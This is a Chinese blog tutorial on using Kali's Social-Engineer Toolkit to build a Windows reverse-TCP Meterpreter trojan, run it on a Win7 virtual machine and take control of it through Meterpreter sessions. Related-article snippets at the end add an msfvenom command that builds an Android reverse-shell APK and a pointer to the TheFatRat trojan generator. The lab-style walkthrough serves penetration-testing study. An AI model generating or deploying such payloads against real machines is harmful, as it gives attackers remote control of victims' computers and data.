【kali-权限提升】(4.2.4)社会工程学工具包:远控木马使用、设置、利用

最新推荐文章于 2024-09-21 09:29:22 发布
最新推荐文章于 2024-09-21 09:29:22 发布
阅读量1.4k 收藏 32
点赞数 3
分类专栏: 0X03【kali渗透】 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126216298
版权
本文档详细介绍了如何使用SET(Social-Engineer Toolkit)生成并利用远控木马进行社会工程学攻击。首先启动SET,选择模块创建有效载荷和侦听器,接着设置payload,如Windows Reverse TCP Meterpreter。然后将payload部署到目标主机,通过监听IP和端口建立会话,最后实现对目标系统的控制,如执行命令、获取系统信息等。
摘要由CSDN通过智能技术生成

目录

远控木马

简介:

1.1、第一步:启动SET

1.2、第二步:选择模块

1.3、第三步:payload选择

1.4、第四步:payload设置

1.5、第五步:返回信息

1.6、第六步:建立会话

1.7、第七步:利用

远控木马

简介:

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制

1.1、第一步:启动SET

输入sudo setoolkit

(或者在工具菜单中找到后打开)

输出的信息详细的介绍了SET。该信息在第一次运行时, 才会显示

接受这部分信息后, 才可进行其他操作。

输入y

 显示了社会工程学工具包的创建者、版本、代号及菜单信息

选择相应的编号进行操作

   1) Social-Engineering Attacks
社会工程攻击
   2) Penetration Testing (Fast-Track)
渗透测试(快速轨道)
   3) Third Party Modules
第三方模块
   4) Update the Social-Engineer Toolkit
更新社交工程工具包
   5) Update SET configuration
更新设置配置
   6) Help, Credits, and About
帮助,学分等

1.2、第二步:选择模块

选择攻击社会工程学,在菜单中的编号为1

输入1

显示了攻击社会工程学的菜单选项, 这时就可以选择攻击工程学的类型, 然后进行攻击

 

   1) Spear-Phishing Attack Vectors
鱼叉式钓鱼攻击向量
   2) Website Attack Vectors
网站攻击向量
   3) Infectious Media Generator
感染性媒体生成器
   4) Create a Payload and Listener
创建有效载荷和侦听器
   5) Mass Mailer Attack
大众邮件攻击
   6) Arduino-Based Attack Vector
基于Arduino的攻击向量
   7) Wireless Access Point Attack Vector
无线访问点攻击矢量
   8) QRCode Generator Attack Vector
二维码攻击向量
   9) Powershell Attack Vectors
Powershell攻击向量
  10) Third Party Modules
第三方模块

1.3、第三步:payload选择

输入编号4,创建有效载荷和侦听器

1) Windows Shell Reverse_TCP               在受害者身上产生指挥外壳,然后寄回攻击者
2) Windows Reverse_TCP Meterpreter         在受害者身上产生仪表壳,然后寄回攻击者
3) Windows Reverse_TCP VNC DLL             在受害者上产生VNC服务器并将其发送回攻击者
4) Windows Shell Reverse_TCP X64           Windows X64命令外壳,反向TCP内联
5) Windows Meterpreter Reverse_TCP X64     连接回攻击者(Windows X64),MeterPreter
6) Windows Meterpreter Egress Buster       产生仪表式外壳,并通过多个端口找到港口房屋
7) Windows Meterpreter Reverse HTTPS       使用SSL通过HTTP通过隧道通信并使用MeterPreter
8) Windows Meterpreter Reverse DNS         使用主机名代替IP地址,并使用反向计量表
9) Download/Run your Own Executable        下载可执行文件并运行它

1.4、第四步:payload设置

选择Windows Reverse_TCP Meterpreter,在受害者身上产生仪表壳,然后寄回攻击者

输入2

设置监听的主机IP(攻击机IP地址)和端口

下面是在本地生成的木马程序payload.exe

 

 /root/.set/

(需要使用root权限打开)

1.5、第五步:返回信息

放到目标主机中(我直接拖过去失败了)

 是exe后缀,但是打开以后

好像是个文件夹

 就要考虑使用其他方式上传/下载到目标主机

为了测试我在虚拟机上下载了wmtool

(原文件路径(可能)和共享文件路径都需要root权限)

在win11里面就能看见了

为了安全起见我移动到了win7中(虚拟机)

点击运行

观察kali变化

(我点击运行了2次)

在这千万别和我一样傻等

按回车键(哈哈哈)

 

1.6、第六步:建立会话

查看会话

输入sessions -i

激活第二条会话

输入sessions -i 2

(获得 Shell 后即可操控 Win 7 靶机)

1.7、第七步:利用

执行命令,截图,提权……

sysinfo
ls

 

黑色地带(崛起)
关注
专栏目录
Kali学习 | 权限提升:5.2 本地权限提升
qq_43233085的博客
01-14 620
Kali学习 | 权限提升:5.2 本地权限提升介绍操作步骤 介绍 上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。 操作步骤 同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。 (1)启动Meterpreter会话。执行命令如下所示: msf auxilia...
msf之msfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4165
msfvenom的使用
kali-权限提升】(4.2.7)社会工程学工具包权限维持创建后门、清除痕迹
08-09 917
权限维持】创建后门、清除痕迹
使用Kali Linux系统生成木马病毒并实现远程控制计算机
最新发布
2401_84578953的博客
09-21 1355
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021(系统)
kali linux将默认的非root提升为root权限
m0_57133702的博客
10-18 873
4、 按下”E“键后,会跳到这个界面,然后按下键(↓)光标会移动到“ linux ”开头的那一行!再将光标移到最后那里,空一格,输入“init=/bin/bash”,最终修改的内容如下图所示,后面无论写了什么,最后都要是“rw quiet splash init=/bin/bash”,差了哪个换那个,假设界面原本显示的是“ro abcdefg”,那么,我们就要改成“rw quiet splash init=/bin/bash”;3、到了这个界面后,在5秒的时间内按下“E”键(键盘上的E,不区分大小写);
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2877
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
kali-TheFatRat木马生成工具安装及简单使用
热门推荐
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
Kali社会工程学套件上的二维码攻击工具
江南一只猫
10-07 2269
Kali 使用QR Code Attack 发起二维码攻击(但其实Kali的QR Code Attack并不能做攻击使用,只能是作为欺骗准备的一部分) 准备工具 QR Code Attack 该工具可以自定义链接到二维码 (但按我理解就是个自定义网址的二维码生成器) 装备KALI系统的电脑 一个意境部署好的钓鱼网站(或者植入木马的网页) 创建攻击组织,搭建攻击网络环境 要使用Kali 去发起...
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
kali-linux详细更新源
tiantang_520的博客
09-13 9000
本文是小编自创,如有雷同,请联系!
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程(1)
2401_84139908的博客
04-09 1099
完成以上步骤之后就可以将生成的木马放到虚拟机上的靶机或者物理机上(随便放到哪里都行)
NT/2K权限提升工具GetAdmin
03-16
Windows NT/2K Privilege Breaker 0.99.2.2 根据网友建议,新增如下功能: 0)添加一个新用户,密码缺省为空;; 1)加入Administrators组后的成员密码修改功能;; 2)在系统权限下运行任何指定程序。 任何用户都可以通过这个工具将自己加入本机的管理员组。 在E2KSP2下测试通过。 请谨慎使用,后果自负!!!!!!!!!!
win7权限提升工具.reg
11-07
win7权限提升工具,实测好用,希望能够帮助大家!win7权限提升工具,实测好用,希望能够帮助大家!
[可行]setoolkit生成木马软件远程控制实例
weixin_33901641的博客
02-12 826
查看原文 选1,social-ensineering attacks 选4,create a payload and listener 选2,Windows Reverse_TCP Meterpreter LHOST 192.168.1.92 PORT 443 得到~/.set/payload.exe 想办法让目标运行payload 回车开始监控。 meterpreter得到,可以使用以下...
Windows权限提升工具推荐:Windows-Privilege-Escalation
gitblog_00207的博客
08-28 385
Windows权限提升工具推荐:Windows-Privilege-Escalation Windows-Privilege-EscalationWindows Privilege Escalation Techniques and Scripts项目地址:https://gitcode.com/gh_mirrors/wi/Windows-Privilege-Escalation 在网络安全领域...
kalilinux-权限提升
weixin_34387284的博客
02-13 564
meterpeter: 可以在 Meterpreter 使用 incognito 来开始模拟过程: use incognito 展示 incognito 的帮助文档,通过输入 help 命令: help 获得可用用户的列表 list_tokens –u 模拟攻击 impersonate_token \willie-pc\willie 本地提权攻击: getsystem 如果你尝试获得 Wi...
探索企业级权限提升:Enterprise Admins 提升工具
gitblog_00043的博客
05-27 339
探索企业级权限提升:Enterprise Admins 提升工具 MakeMeEnterpriseAdmin项目地址:https://gitcode.com/gh_mirrors/ma/MakeMeEnterpriseAdmin 项目简介 在网络安全领域,了解和掌握系统漏洞与攻击手段是至关重要的。今天,我们向您推荐一个独特且颇具挑战性的开源项目——一个用于模拟企业管理员(Enterprise A...
探索Ember Uploader:高效、灵活的文件上传解决方案
gitblog_00083的博客
06-05 276
探索Ember Uploader:高效、灵活的文件上传解决方案 ember-uploader An Ember library for uploading files 项目地址: https://gitcode.com/gh_mirrors/em/ember-up...
msfvenom生成远控后门木马
2303_76389797的博客
04-18 421
这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。
使用Kali Linux的SEToolkit进行社会工程学攻击:钓鱼网站实战
"此文档是关于如何使用Kali Linux中的社会工程学工具包(SEToolkit)进行克隆网站和钓鱼攻击的教程,由飞哥原创。文档详细介绍了在Kali Linux利用SEToolkit创建钓鱼网站的过程,包括启动工具、选择攻击向量等步骤...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值